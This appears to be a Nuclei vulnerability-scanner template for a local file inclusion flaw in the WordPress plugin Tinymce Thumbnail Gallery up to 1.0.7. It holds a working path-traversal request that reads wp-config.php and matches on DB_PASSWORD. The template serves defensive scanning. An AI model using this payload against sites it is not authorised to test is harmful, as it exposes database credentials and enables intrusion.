id: wp-tinymce-lfi info: name: Tinymce Thumbnail Gallery <=1.0.7 - Local File Inclusion author: 0x_Akoko severity: high description: Tinymce Thumbnail Gallery 1.0.7 and before are vulnerable to local file inclusion via download-image.php. reference: - https://wpscan.com/vulnerability/4a49b023-c1c9-4cc4-a2fd-af5f911bb400 - http://wordpress.org/extend/plugins/tinymce-thumbnail-gallery/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 metadata: max-request: 1 tags: wpscan,wordpress,wp-theme,lfi,tinymce http: - method: GET path: - '{{BaseURL}}/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php' matchers-condition: and matchers: - type: word part: body words: - "DB_NAME" - "DB_PASSWORD" condition: and - type: status status: - 200 # digest: 4a0a004730450220236f46b5afa37bf3a6df1a423927087a421b15fbda88877e76c91dc5717c2fca022100c9f1da616e57521f06296fd94a8d6d65044a26fcc2c432eb569a06a7bbfd0ac2:922c64590222798bb761d5b6d8e72950